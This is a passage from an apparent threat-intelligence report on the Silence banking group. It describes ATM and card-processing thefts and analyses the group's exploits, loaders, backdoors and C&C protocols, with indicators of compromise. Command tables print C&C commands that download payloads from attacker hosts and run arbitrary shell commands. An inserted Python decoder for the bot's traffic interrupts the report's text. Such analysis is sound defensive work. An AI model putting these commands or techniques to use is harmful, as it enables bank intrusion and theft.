because the server was virtual and ran 24/7.\r\nOn 01.08.2016, the hackers installed the patched backdoor Kikothac, netsrvc32.exe, on one of the employees’ computers. 
This software allowed execution of files and commands received from the C\u0026C server at the following IP: 193.169.245[.]89.\r\nOn 02.08.2016, a piece of software, svchost.exe or RAdmin, was installed on this very PC. The software was not detected by the anti-malware solution used in the bank. Then, the file for reconciliation of payments (downloaded from the automated banking system with the payments that were to be uploaded to AWS CBR) was changed (compromised). AWS CBR had been installed by the bank’s security team to fight theft.\r\nIn addition, the computer was found to contain mss.exe, which is Silence.SurveillanceModule, a module that spies on the user’s desktop. In this way, the attackers tried to learn how an operator works in order to correct their mistakes and conduct a fraudulent transaction.\r\nThis theft was prevented because the bank decided to engage Group-IB information security and incident response experts. Unfortunately, we did not manage to restore the full course of events, because in an attempt to clean the network, the bank’s IT team deleted the majority of the attackers’ traces.\r\nATMs\r\n[Diagram: ATM attack chain. Components shown: Malicious.doc OR Malicious.chm, Malicious.lnk, Malicious.js, Silence.Downloader, C\u0026C Server, Silence MainModule, Silence SurveillanceModule, ProxyBot, RADMIN, Atmosphere Dropper, Atmosphere Injector, Atmosphere.dll, dispense command, ATM, Money, Mule]\r\nOn 10.08.2017, a bank employee received an email in their corporate mailbox from josueruvalcaba@mail[.]com with the following subject: \"Message has been disinfected : Double Spending With A Card\". The email contained an attachment called \"Account Statement.docx\". After opening the attachment, an EPS script was launched, which exploited two Microsoft Word vulnerabilities, CVE-2017-0262 and CVE-2017-0263. 
This allowed the attackers to create a backdoor in the system and escalate privileges. The employee opened the attachment and, despite the anti-malware solution reporting the successful deletion of malicious files, the Silence loader was launched.\r\nOn 11.08.2017, this workstation was used to scan the local network using Nmap. As a result, the hackers found vulnerable workstations: Windows-based nodes that were vulnerable to CVE-2008-4250. The vulnerability affects Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta. These versions of Windows contain a vulnerability in the Server service which allows remote code execution. It is caused by incorrect processing of specially crafted RPC requests. With this vulnerability, the attacker might gain full control over the system.\r\nExperts identified successful attempts by the anti-malware solution to block the download of Meterpreter stagers.\r\nOn the same day, a file called m32.exe was created in the file system of the workstation. This file is the Farse utility (a unique Mimikatz-based program developed by the attackers), which extracts passwords, hashes and PINs.\r\nIn addition, the workstation used for AWS CBR was found to have launched procdump.exe, which might have been used to create a copy (dump) of lsass.exe, which, in turn, could be used to extract passwords using Mimikatz.\r\nFrom 11.08.2017 to 14.09.2017, the winexesvc service was created. This service allows commands issued from GNU/Linux systems to be executed remotely on Windows computers over the SMB protocol.\r\nOn 07.10.2017, workstations were accessed using standard Microsoft Remote Desktop Web Access. 
That said, there was no data on RDP connections in the Windows system logs for this date. It was probably deleted.\r\nAccording to Radmin Server 3 logs, on 08.10.2017 one of the ATMs was remotely accessed from the workstation of a bank employee. After this, unique software for interaction with the dispenser was installed.\r\nLater, this software made the ATMs dispense all their cash at a specific time. The total amount stolen was over $100,000.\r\nWhile investigating the network topology, the hackers gained access to a machine with AWS CBR, which is evidenced by the files created on the server. The attackers gained access to the machine with a domain administrator account and then connected to it using RAdmin.\r\nDespite the fact that the machine was connected to AWS CBR, the criminals did not use this vector.\r\nIn April 2018, the group withdrew funds again through ATMs. During a single night they siphoned about $150,000. This time, the Atmosphere program was not burdened with redundant features and ran stably without bugs.\r\nCard Processing\r\nIn 2018, in an attack on another bank, the group used the privileged account of a bank employee to change the cash withdrawal limits of previously activated cards. Later, the mules used the cards to empty ATMs. The complication was that they were cashing out at the ATMs of a partner bank, not the bank itself. The partner’s ATMs had no withdrawal limits set. The total amount stolen was over $550,000.\r\n[Diagram: card processing attack chain. Components shown: Malicious.doc OR Malicious.chm, Malicious.lnk, Malicious.js, Silence.Downloader, C\u0026C Server, Silence MainModule, Silence.ProxyBot, Farse, workstation, Card Processing (Increase card limits), Card with no limits, ATM, Mule, $]\r\nDuring the response to this incident, Group-IB experts found a lot of .bat scripts, which just launched software, cleared logs and generally automated the work. 
All software and scripts were saved in the c:\\intel, c:\\atm, and c:\\1 directories.\r\nFor software debugging, the hackers used the legitimate Listdlls and RogueKiller tools, and for deleting traces they used sdelete.exe. They also utilized self-developed software for clearing the RAdmin logs.\r\nTECHNICAL DESCRIPTION OF THE TOOLS\r\nThis section is devoted to the technical analysis of the software and tools used by Silence to conduct the attacks. In general, five groups can be identified:\r\n1. Unique modifications of exploits used to deliver the Silence backdoor loader;\r\n2. The unique Silence Trojan, its spying modules and ProxyBot, used to connect isolated segments of the target corporate network to the criminals’ C\u0026C server. The group also used the patched backdoor Kikothac for some time;\r\n3. A unique set of tools for emptying ATMs called Atmosphere. It contains software to interact with the dispenser and software to inject a malicious library into the dispenser process;\r\n4. Service software, including legitimate administration tools used by the group in the attacks;\r\n5. DDoS IRC bot.\r\nAttachments\r\nCVE-2017-0262 + CVE-2017-0263, APT28 related\r\nFile Name | MD5 | File Description\r\nContract.docx | 57f51443a8d6b8882b0c6afbd368e40e | Microsoft Word file exploiting the CVE-2017-0262 vulnerability\r\nimage1.eps | cf9a68ace36f24b80daf9afe1d7dab44 | EPS file\r\njoiner.dll | | DLL dropper\r\n | | x32 version of the exploit for the CVE-2017-0263 vulnerability\r\n | | x64 version of the exploit for the CVE-2017-0263 vulnerability\r\nAfter opening the Contract.docx file from the phishing email, the user sees the following text in Russian:\r\nContract.docx is a .doc file designed to exploit the CVE-2017-0262 vulnerability in Microsoft Word. This file contains an EPS script file, image1.eps (7d1c38c3cba1b1ce644d75fa3fd8e65545fdad8b5b21fe630d162cd0bdd87e40). 
The content was encrypted using byte-to-byte XOR with the key 7a5d5e20. Once decrypted, it reveals code sections using the \"forall\" operator, which indicates exploitation of the above-mentioned vulnerability through incorrect processing of EPS files, as well as a shellcode in string format (hereinafter Shell1).\r\nIt is interesting to note that the exploit contains variables with names composed of lyrics from \"Snuff\" by Slipknot (e.g. You-sold-me-out-to-save-yourself).\r\nThe exploit performs the following actions:\r\n1. It allocates memory in the Microsoft Word process at the address 0x58a80000 and writes a shellcode (hereinafter – Shell2) there. This shellcode is required to save and run a backdoor, which is described below. It should be noted that the backdoor file is stored inside the shellcode.\r\n2. In the Microsoft Word memory space, a section of code required to unpack the DLL dropper (hereinafter – Shell3) is decrypted. The export section of the DLL contains the \"fork\" function, which is called immediately after unpacking. The library name is \"joiner.dll\", SHA256: eea57047413bd7ae6b58e3a3fc4921092920949fd2fd189144ce71d0fa44239d.\r\n3. The \"fork\" function is used to determine the bitness of the infected system and decrypt the module that exploits the CVE-2017-0263 vulnerability. This enables the threat actor to gain SYSTEM privileges.\r\n4. Control is transferred to the shellcode at the address 0x58a80000. This shellcode saves the WINWORD.exe file (c90df05f360fc6566bd226a2e93d91f10e753e3d9bb4a3cd9e2c7305c80749f3) to the directory \"C:\\Users\\\u003c%username%\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" under the name \"WINWORD.exe\". Following this, the backdoor is executed within the WINWORD.exe process. 
It should be noted that these actions are performed with SYSTEM privileges.\r\n[Figure: General scheme of infection. Labels: Contract.doc; Encrypted EPS exploit file; Decrypted EPS exploit file (Shell1); Exploit decryption and launch; Shell3 is decrypted and written to the address 0x58a80000; Dropper; Privilege escalation modules; Privilege escalation, transferring control to address 0x58a80000; Shell2 is decrypted and written to the address 0x58a80000; Backdoor is saved to the startup directory and launched]\r\nOn May 9, 2017, ESET published a report on the software tools of the APT28 group (https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/). The approach to infecting the system and the features in the investigated case correspond with the ones in the published report. However, we found key differences showing that the APT28 software tools were used by another group to steal money. We noted that in the case described by ESET, control was not passed to the 0x58a80000 address. After investigating the code of both exploits in more detail, we discovered that the code of APT28’s DLL dropper was patched to pass control to the shellcode at 0x58a80000 (Shell2), which is necessary to save the backdoor to a file and launch it. The modified part of the code is shown in the image below:\r\n[Figure: Part of the code of the Fork function in the investigated (below) and ESET (above) cases]\r\nFrom the presented parts of the code, it is clear that the call and cmp instructions were replaced with nop, push, and retn. The push and retn instructions need 6 bytes (5 and 1 respectively), while call and cmp need 8 bytes. 
The two remaining bytes were changed to nop instructions in the process, which is evidenced by the changes in the dropper at the level of assembler instructions.\r\nCHM\r\nFile Name | MD5 | File Description\r\nLetter of Intent.chm | dde658eb388512ee9f4f31f0f027a7df | CHM file that downloads and executes remote VBS code when opened\r\ni.vbs | | Remote VBS code, which downloads and launches the Silence loader\r\nrpc32.exe | 404d69c8b74d375522b9afe90072a1f4 | Silence.Downloader\r\nOne of the phishing emails contained a help file called Letter of Intent.chm. Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.\r\nIt was introduced as the successor to Microsoft WinHelp with the release of Windows 98 and is still supported in Windows 7. Although the format was designed by Microsoft, it has been successfully reverse-engineered and is now supported in many document viewer applications.\r\nThis file type is still supported by Microsoft, and the software for viewing the help content is still included in the standard Windows package. The format allows the threat actor to embed JavaScript and execute remote VBScript and/or PowerShell code by calling mshta.exe or powershell.exe.\r\nAlthough the vector is not new and was used as far back as 2015 to deliver malware, delivering files of this type is not at all typical for the CIS and, in some cases, helps to evade detection and pass through corporate security systems.\r\nThe Letter of Intent.chm file is a compiled HTML file with interactive help. 
After decompiling, the file has the following structure:\r\nWhen the help file is launched, the entry point is the file called start.htm. In the body of this HTML file there is an object with interactive content:\r\nAfter the help file is opened, the VB script is downloaded from the remote server at 139.99.156[.]100. The script is then launched with the system interpreter mshta.exe. The VB script, in turn, downloads the Silence.Downloader backdoor, saves it in %TEMP%\\rpc32.exe and launches it.\r\nLNK\r\nStandard Windows shortcuts (links to files with a .LNK extension) can be used to launch arbitrary programs and pass them specific arguments. At the same time, an attacker can define which icon to display to deceive regular users. Apart from that, Windows does not display the extension of a shortcut.\r\nstruct LNK {\r\n    struct ShellLinkHeader sShellLinkHeader;\r\n    struct LinkTargetIDList sLinkTargetIDList;\r\n    struct LinkInfo sLinkInfo;\r\n    struct StringData NAME_STRING;\r\n    struct StringData RELATIVE_PATH;\r\n    struct StringData WORKING_DIR;\r\n    struct StringData COMMAND_LINE_ARGUMENTS;\r\n    struct StringData ICON_LOCATION;\r\n    struct ExtraData sExtraData;\r\n};\r\nShortcut structure\r\nWhen the file is formed in a certain way, the PowerShell interpreter can be launched with a prepared script passed to it for execution as a parameter.\r\nSilence Trojan\r\nThe unique Trojan used by the group is modular. 
It consists of the following components (discovered by Group-IB; there could be more):\r\n• Loader;\r\n• Main module (in the early attacks the hackers used a patched backdoor called Kikothac);\r\n• Module for spying on users;\r\n• Proxy.\r\nThe main module can load any other executable file, which does not limit the system’s functionality and leaves room to extend its features.\r\nNone of the programs are obfuscated.\r\nSilence.Downloader\r\nFile Name | MD5 hash\r\nWINWORD.exe, IntelSofts_\u003c%disk serial number%\u003e.exe | 5b4417521c71cc89cd3b2fe94ab395b2, c6c84da4f27103db4ff593f4d4f45d95\r\nIntel Security.exe | b4313151019b2091cbd27c8810e5c7c5, ef0fb10c602e3ee81e3677c83a44b409\r\nSecuritySoftWare | a58a830dce460e91217328bdefb25cbe, a1e210598820cbb08e269b2dfd96e741\r\nrpc32.exe | 404d69c8b74d375522b9afe90072a1f4, b09b8be361cd0e30a70cc4603a31d1ee, 3345dde0c827dcbda993f7216a8d7c12\r\nfile.exe | 43eda1810677afe6791dd7a33eb3d83c, 7d3614df9409da3933637f09587af28c, 7d8af1f6cf7d08c0c39e03033585d404, 9b037ead562c789620a167af85d32f72\r\npripr.exe | 97599e2edc7e7025d5c2a7d7a81dac47\r\nThe file WINWORD.exe is a backdoor. The program is designed to download and launch Silence’s main Trojan. After WINWORD.exe is launched, the Trojan performs the following activity:\r\n1. It retrieves the serial number of C://. If unsuccessful, it finds out the serial number of D://. If unsuccessful for the second time, the malware extracts the serial number of E://.\r\n2. Then it creates a computed mutex, unique for the current machine, for interprocess synchronization.\r\n3. 
The infinite loop is as follows:\r\n• the bot sends a GET request every 5 seconds to the server 158.69.218[.]119/script.php?name=\u003c%disk serial number%\u003e.\r\n• In response it may receive one of the following commands:\r\nCommand | Description\r\nfal | The software copies itself to C:\\ProgramData under the name IntelSofts_\u003c%disk serial number%\u003e.exe. Then it creates a value named IntelSofts (only if it is not yet present) with the data C:\\ProgramData\\IntelSofts_\u003c%disk serial number%\u003e.exe in the HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key. Deletes C:\\ProgramData\\IntelSofts_\u003c%disk serial number%\u003e.exe:Zone.Identifier.\r\nDEL | Deletes the above-mentioned value and terminates the application\r\n\"|http\u003cwebsite address\u003e\" | Deletes C:\\ProgramData\\MicrosoftsUpdte.exe and downloads a file from the URL sent by the server. The downloaded file is saved on the infected device as C:\\ProgramData\\MicrosoftsUpdte.exe. After this, it launches the downloaded file with either the CreateProcess() function or the ShellExecute() function.\r\nIt is worth noting that a copy of this file is also saved in C:\\Users\\\u003c%username%\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup under the name WINWORD.exe. This is a result of the execution of the exploit that installed the software on the system.\r\nWe found several programs of this type at different times. On March 20, 2018, a Silence loader compiled on March 2, 2018 was uploaded to VirusTotal. The new version had only minor changes:\r\n1. The bot calls the GetModuleHandleA(\"kernel32\") function 5555000 times. This loop is designed to hinder dynamic analysis. No other anti-analysis measures are present.\r\n2. It retrieves the serial number of C://. If unsuccessful, it finds out the serial number of D://. 
If unsuccessful for the second time, it finds out the serial number of E://. If unsuccessful, it assigns the value 1110101011 to the variable that stores the serial number.\r\n3. Then it launches an infinite loop of server command processing and sends the following GET request every 120 seconds: 91.207.7[.]86/I/checkinfo.php?name=\u003c%disk serial number%\u003e\r\n4. Regardless of the result of the server call, the bot ensures persistence as follows:\r\n• Creates its own copy in C:\\ProgramData called Intel Security.exe.\r\n• Creates a value named Intel(R) Common Security with the data C:\\ProgramData\\Intel Security.exe (if it is not present) in the HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key.\r\n• Deletes the :Zone.Identifier stream of its copy in C:\\ProgramData.\r\n• In the previous version of the bot, persistence was not ensured before receiving the fal command.\r\n5. Following this, the bot processes the response. There are several response options:\r\nCommand | Description\r\nDEL | Deletes the registry value described above and terminates the application\r\nhttp://\u003cwebsite address\u003e | Deletes C:\\ProgramData\\TEMP-DATA-2-34-56-6-23_\u003c%result of multiplication of GUID structure fields%\u003e.exe and then downloads the file from the URL sent by the server. The downloaded file is saved on the infected device as C:\\ProgramData\\TEMP-DATA-2-34-56-6-23_\u003c%result of multiplication of GUID structure fields%\u003e.exe. After this, the file is launched with the CreateProcess function. 
The bot \"sleeps\" for 2 seconds before the launch.\r\nWe can see that the fal command was removed and the name of the file in which Silence will be saved was changed.\r\nPatched Kikothac\r\nFile Name | MD5 hash\r\nnetsrvc32.exe | 9628d7ce2dd26c188e04378d10fb8ef3, 0074d8c3183e2b62b85a2b9f71d4ccd8, 440b21958ad0e51795796d3c1a72f7b3, b7f97100748857eb75a6558e608b55df\r\nThe software is classified as Backdoor.Kikothac. The application can transfer information about the infected device, download files, upload files to the C\u0026C server, launch and terminate processes, modify registry entries, and execute commands in the command interpreter. It uses the IP address 46.183.221[.]89 as a C\u0026C server. Analysis shows that the application was patched.\r\nAction Sequence\r\n• The software uses the SetUnhandledExceptionFilter function to register a top-level exception handler that terminates the bot in case of any error.\r\n• The startup loop has 10 iterations with a 1-second interval. The software opens a mutex named ServiceHelper#56 0.2.21.0001_srv. If there was an error opening it, it tries to create a mutex with this name. If the open succeeded all 10 times, or mutex creation was unsuccessful, the application is terminated.\r\n• The software registers a service named Microsoft Service Watcher via StartServiceCtrlDispatcher() in the context of its own process. The service launch process:\r\nAll further actions happen in the service handler, namely:\r\n• The service checks the system time. If it is set to zero, the bot stops working.\r\n• Calls the server with the IP address 46.183.221[.]89. 
The interaction process can be described with the following stages:\r\n• Lists user accounts in the registry and looks for the ProxyEnable value in the Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings key. If such a field is found, it gets the default proxy server and uses it to communicate with the C\u0026C server.\r\n• Reads the content of \u003c%Folder where the bot is located%\u003e\\hostent, which should hold a description/identifier of the bot. After that, it sends the content to the C\u0026C server. If the file is not present, the service sends the following string to the server: \".: No desc :.\".\r\n• Switches to the loop of receiving and executing commands from the C\u0026C server.\r\nWhen receiving data from the server, the bot looks for its own commands (the list is given below). If no command matched, the bot passes the string to a cmd.exe process and sends the resulting output to the C\u0026C server. Some bot commands only launch with parameters. For this, the command handler checks the number of received parameters, where the first parameter is always the command itself.\r\nBot Commands:\r\nCommand | Function | Possible Responses | Example\r\n#wput | Get a file from the infected device. The command accepts 4–5 parameters, namely file name, URL, and port. The usage of 5 parameters was not discovered. | \"OpenReq failed\" – error during operation of the HttpOpenRequest function; \"Connect failed\" – error during operation of the InternetConnect function; \"InetOpen failed\" – error during operation of the InternetOpen function; \"ERR:2\" – error while reading a file; \"ERR:1\" – the number of parameters is not equal to 4 or 5. | #wput localhost 4242 test.txt\r\n#wget | Download a file to the infected device. The bot accepts two parameters: URL and file name. When the /d flag is present, it does nothing. 
Changes the date and time of file creation, last access, and last change to the values of the same fields of \"kernel32.dll\". | \"ERR:1\" – the number of parameters is not equal to 3; \"Save/Get failed\" – error while downloading the file; \"Saved\" – the file is downloaded and saved | #wget hxxp://www.constitution.org/usdeclar.txt text.txt\r\n#ver | Get the bot version. | \"0.2.21.0001_srv_i86\" | #ver\r\n#p | Refresh the time of the last response/call to the server. The command is meaningless because refreshing is automatic and happens upon receiving a message from the server. | No response | #p\r\n#d | Stop the bot from calling the server for an hour and stop the cmd.exe process launched earlier. | No response | #d\r\n#clean | Terminate the cmd.exe process launched earlier. | No response | #clean\r\n#tl | Get the list of running processes. | The response is a list of running processes in the following format: process=\u003c%process_name%\u003e pid=\u003c%PID%\u003e prnt=\u003c%Process PID%\u003e. An example of the response is in Annex 1. | #tl\r\n#tk | Terminate the process using its PID. | \"ERR:1\" – the number of parameters is not equal to 2; \"Failed to open process, \u003c%PID%\u003e\" – failed attempt to open the process; \"Killed\" – the process is terminated. | #tk 616\r\n#selfpath | Get the path to the module file. If the command does not get a parameter, it responds with the path to the bot’s executable file. | Path to the file; \"ERR:3\" – error while querying a process of the application | #self Kernel32\r\n#setid | Write the parameter string to \u003c%Path to folder with the bot%\u003e\\hostent. Changes the date and time of file creation, last access, and last change of the bot’s file to the values of the same fields of \"kernel32.dll\". | No response | #setid test_string\r\n#ctype | Get information on the proxy. 
 | SID=`\u003c%User SID%\u003e`, cstr=`\u003c%CnC%\u003e:\u003c%Port%\u003e` – in case one of the users has a proxy server configured by default; No proxy – if no user of the infected machine has a proxy server configured by default. | #ctype\r\n#fsredirect | Enable/disable file system redirection. | No response | #fsredirect on; #fsredirect off\r\n#ccc | Delete the HKLM\\Software\\KingKongThai\\cc key from the registry. The second parameter must be the string \"yes\". | \"Done.\" | #ccc yes\r\n#cca | Change the value whose name is received as a parameter in the HKLM\\Software\\KingKongThai\\cc registry key. The value is set to 0. | \"ERR:4_2\" – opening the HKLM\\Software\\KingKongThai\\cc key was not successful; \"ERR:4_1\" – writing the value was unsuccessful; \"Done\" – if successful | cca test_val\r\n#ccd | Delete a value from the HKLM\\Software\\KingKongThai\\cc registry key. The value name is received as a parameter. | \"ERR:4_2\" – opening the HKLM\\Software\\KingKongThai\\cc key was not successful; \"Done\" – if successful. | #ccd test_val\r\n#ccl | Get the names of all values in the HKLM\\Software\\KingKongThai\\cc registry key. | \"ERR:4_1\" – opening the HKLM\\Software\\KingKongThai\\cc key was not successful; \"ERR:4_0\" – an attempt to get information on the registry key was unsuccessful; otherwise the data is received in the following format: ----------------- \u003c%value1 name%\u003e \u003c%value2 name%\u003e ----------------- | #ccl\r\n#wts_enum | Get the list of sessions using WTS functions. | For examples, refer to Annex 2 | #wts_enum\r\n#wts_start | Execute the command. 
Several strings are received as parameters: 1) Console – launch on behalf of SYSTEM, or any other string; 2) Commands. | Command line ‘\u003c%received command%\u003e’ executed. – if successful; \"ERROR: Failed execute ‘\u003c%received command%\u003e’ \u003c%GetLastError result%\u003e\" – if not successful. | #wts_start Console cmd.exe ping 127.0.0.1\r\n#help | No activity performed | |\r\nAny other string | Send the string to cmd.exe. | Output. | ipconfig\r\nC\u0026C communications\r\nThe bot uses port 80 to communicate with the server. The data sent over this port is encrypted. If the infected device has a proxy server configured by default, the bot uses it.\r\nThe bot connects to the C\u0026C server regularly. If a connection is not established within 60 minutes, the bot \"snoozes\" for 5 minutes.\r\nThe traffic between the infected machine and the C\u0026C server is encrypted using a byte-to-byte XOR with a pseudo-random byte generated for each message. The message structure is as follows:\r\nstruct message {\r\n    char key;\r\n    char unuseful_1; // -1\r\n    char unuseful_2; // 0\r\n    int length;\r\n    char ciphertext[length];\r\n}\r\nChanges of the C\u0026C IP address in the executable file\r\nThrough analysis of the bot’s memory, we discovered, apart from the C\u0026C address, the address 185.29.9[.]45, which is not used by the program anywhere. In addition, both the connectivity function and the standard __NMSG_WRITE function referred to the C\u0026C address. Having researched other versions of this bot, we found an interesting peculiarity. 
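The message framing described under "C&C communications" above, decoded as an added example for incident-response traffic analysis (this is not Group-IB's tooling or the bot's own code): a key byte, two marker bytes (-1 and 0), a length and the XOR-encrypted body. Assumptions not stated on the page: the `int length` field is a 4-byte little-endian value, the struct is packed on the wire with no alignment padding, and the key XORs only the ciphertext. The sample payload is constructed inline; each decrypted message is also classified as one of the bot's own commands from the command table or as a string the bot would hand to cmd.exe.

```python
"""Decoder for the Kikothac C&C message framing described in this section.

Added example, not Group-IB's tooling or the bot's own code. Assumptions
(not stated on the page): 'int length' is a 4-byte little-endian value, the
struct is packed on the wire (no alignment padding), and the key byte XORs
only the ciphertext.
"""
import struct
from typing import Iterator, List, NamedTuple

# struct message { char key; char unuseful_1; /* -1 */ char unuseful_2; /* 0 */
#                  int length; char ciphertext[length]; }
HEADER = struct.Struct("<Bbbi")  # assumption: packed, little-endian

# Commands from the bot command table in this section; anything else is
# handed to cmd.exe by the bot, which is the case an analyst wants flagged.
KNOWN_COMMANDS = {
    "#wput", "#wget", "#ver", "#p", "#d", "#clean", "#tl", "#tk", "#selfpath",
    "#setid", "#ctype", "#fsredirect", "#ccc", "#cca", "#ccd", "#ccl",
    "#wts_enum", "#wts_start", "#help",
}


class Message(NamedTuple):
    key: int
    plaintext: bytes
    kind: str  # "bot-command" or "cmd.exe"


def classify(plaintext: bytes) -> str:
    """A message whose first token is a known bot command is handled by the
    bot itself; any other string is passed to a cmd.exe process."""
    tokens = plaintext.split(None, 1)
    first = tokens[0].decode("latin-1") if tokens else ""
    return "bot-command" if first in KNOWN_COMMANDS else "cmd.exe"


def encode_message(plaintext: bytes, key: int) -> bytes:
    """Frame and XOR-encrypt one message. Used here only to build the
    constructed sample traffic below; a real capture replaces it."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    ciphertext = bytes(b ^ key for b in plaintext)
    return HEADER.pack(key, -1, 0, len(ciphertext)) + ciphertext


def iter_messages(payload: bytes) -> Iterator[Message]:
    """Walk a captured TCP payload, validate each header and decrypt the body.

    Raises ValueError on a bad marker or a truncated message so a partial or
    mis-aligned capture is reported instead of being silently mis-decoded.
    """
    offset = 0
    while offset < len(payload):
        if len(payload) - offset < HEADER.size:
            raise ValueError(f"truncated header at offset {offset}")
        key, marker1, marker2, length = HEADER.unpack_from(payload, offset)
        if marker1 != -1 or marker2 != 0:
            raise ValueError(f"unexpected marker bytes at offset {offset}")
        if length < 0:
            raise ValueError(f"negative length at offset {offset}")
        start = offset + HEADER.size
        end = start + length
        if end > len(payload):
            raise ValueError(f"truncated body at offset {offset}: need {length} bytes")
        plaintext = bytes(b ^ key for b in payload[start:end])
        yield Message(key, plaintext, classify(plaintext))
        offset = end


def decode_messages(payload: bytes) -> List[Message]:
    """Decode every message in a payload (raises on the first malformed one)."""
    return list(iter_messages(payload))


# Constructed sample: two server-to-bot messages as they would appear back to
# back in one TCP payload, each with its own key byte.
SAMPLE_PAYLOAD = encode_message(b"#ver", 0x5A) + encode_message(b"ipconfig /all", 0xC3)

if __name__ == "__main__":
    for msg in decode_messages(SAMPLE_PAYLOAD):
        print(f"key=0x{msg.key:02x} kind={msg.kind:<11} {msg.plaintext!r}")
```

Because the key travels in the first byte of every message, a network sensor can decrypt the body without any shared secret; in a real capture, feed the reassembled TCP stream to `decode_messages` and treat every `cmd.exe`-kind message as an executed operator command worth recording in the incident timeline.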
In the investigated sample, the standard\r\nstring Microsoft Visual C++ Runtime Library was changed to: 46.183.221[.]89\\0 C++\r\nRuntime Library:\n\n45\r\nThe unused address (185.29.9[.]45) is in the same place as in the unchanged\r\nsamples:\r\nThe string with the IP address of the C\u0026C server of the Silence group is longer\r\nthan the C\u0026C address in the original file. Therefore, the usual change of the IP\r\naddress (185.29.9[.]45) in the same place of the executable file leads to incorrect\r\noperation of the software. This was the reason for changing the Microsoft Visual\r\nC++ Runtime Library string and not changing the address string from the original\r\nfile.\r\nThe bot has a relatively simple traffic encryption mechanism, that is why reverse\r\nengineering of the protocol does not take long. This shows that the sample was\r\nchanged manually using the regular HEX editor and was not rebuilt for the new\r\nC\u0026C server.\r\nSilence.MainModule\r\nFile Name MD5 hash\r\nMicrosoftUpdte.exe f1954b7034582da44d3f6a160f0a9322\r\nnetsrvc32.exe cfffc5a0e5bdc87ab11b75ec8a6715a4\r\ndwenole.exe c4f18d40b17e506f42f72b8ff111a614\r\nsrv_cons.exe b43f65492f2f374c86998bd8ed39bfdd\r\na3de4a1e5b66d96183ad42800d6be862\r\nThe file in question, MicrosoftUpdte.exe, is classified as Silence.MainModule and\r\nhas capabilities to execute remote commands covertly, add itself to startup, and\r\ndownload arbitrary files from the network servers.\r\nAfter the launch:\r\n• The file checks for the following registry keys: \"HKCU\\Software\\Microsoft\\\r\nWindows\\CurrentVersion\\Run\" and \"HKLM\\Software\\Microsoft\\Windows\\\r\nCurrentVersion\\Run\". If they are present and there is permission to write in\r\nthese keys, the file adds itself to startup by writing itself in both keys. 
The respective registry entries are as follows:\r\n[HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"javaplatform\" = \u003cpath_to_exe\u003e\r\n[HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"javaplatform\" = \u003cpath_to_exe\u003e\r\nwhere \u003cpath_to_exe\u003e is the path to the exe from which the file was launched. The file is not moved or copied anywhere else (the Silence.Downloader loader has already done this during the previous step).\r\n• The bot uses the CreatePipe function to create a pipe, which will be used for interprocess communication with other modules.\r\n• After that, the bot remains inactive, waiting for further commands from the C\u0026C server.\r\nNetwork communications are performed using unencrypted connections via HTTP GET requests.\r\nPossible types of connection to C\u0026C:\r\nType of connection | Description | Example of client request to C\u0026C\r\nConnect1 | Registration | http://192.168.19[.]171/index.php?xy=1\r\nConnect2 | Commands request | http://192.168.19[.]171/index.php?xy=2\u0026axy=1234567890\r\nConnect3 | Sending return results | http://192.168.19[.]171/index.php?xy=2\u0026axy=1234567890\u0026bxy=aaaaabbbbccc\r\n• The first \u003crequest1\u003e request is sent to the C\u0026C server in the following form:\r\nhttp://\u003ccnc\u003e/index.php?xy=1\r\nExample of request:\r\n\"http://192.168.19[.]171/index.php?xy=1\"\r\n• As a response to the first request from the client, the C\u0026C server sends a server response (\u003cresponse1\u003e), which, according to debugging information in the file, is the identifier of the client.
This is 1234567890 on the screenshot below:\r\n• \"xy=1\" and the User-Agent are hard-coded, meaning they can serve as a basis for writing signatures to detect malicious network traffic:\r\nWe have also seen other User-Agents in different versions of the Trojan:\r\nYear | User-Agent\r\n2017 | Microsoft Internet Explorer\r\n2018 | \\r\\n\\r\\n\r\n• Next, the file sends the second \u003crequest2\u003e request to the C\u0026C. It looks as follows: \"http://cnc/index.php?xy=2\u0026axy=\u003cresponse1\u003e\", where \u003cresponse1\u003e is the response of the server to \u003crequest1\u003e.\r\nExample:\r\nBelow is a table of C\u0026C commands that the malware executes:\r\nCommand | Command type | Description | Example of use\r\nhtrjyytrn | reconnect | Terminates the command interpreter, clears all temporary files, connects to the C\u0026C \"from scratch\" | htrjyytrn\r\nhtcnfhn | restart | Terminates the command interpreter and restarts it | htcnfhn\r\nytnpflfybq | notasks | No operation | ytnpflfybq\r\n#wget | wget | Download a file from a remote server and save it in the current directory | #wget 192.168.19[.]171/f.exe 1.exe\r\nshell\\n | shell | Launch the command interpreter | shell\\n\r\n\\n\u003ccmd\u003e | run | Execution of an arbitrary OS command via the command interpreter | \\nipconfig\r\n• It is worth noting that the command codes are Cyrillic words typed with an English keyboard layout. This shows that the developer is a Russian speaker.\r\n• The ‘restart’ command restarts the command interpreter, for example if the current console is unresponsive.\r\n• The shell\\n command launches a new hidden instance of the OS command interpreter, which will be used to covertly launch commands (the last row in the table of commands) on the infected machine.\r\n• The #wget command delivers files from a remote server to the PC. It is used to specify which file to download and under what name to save it.
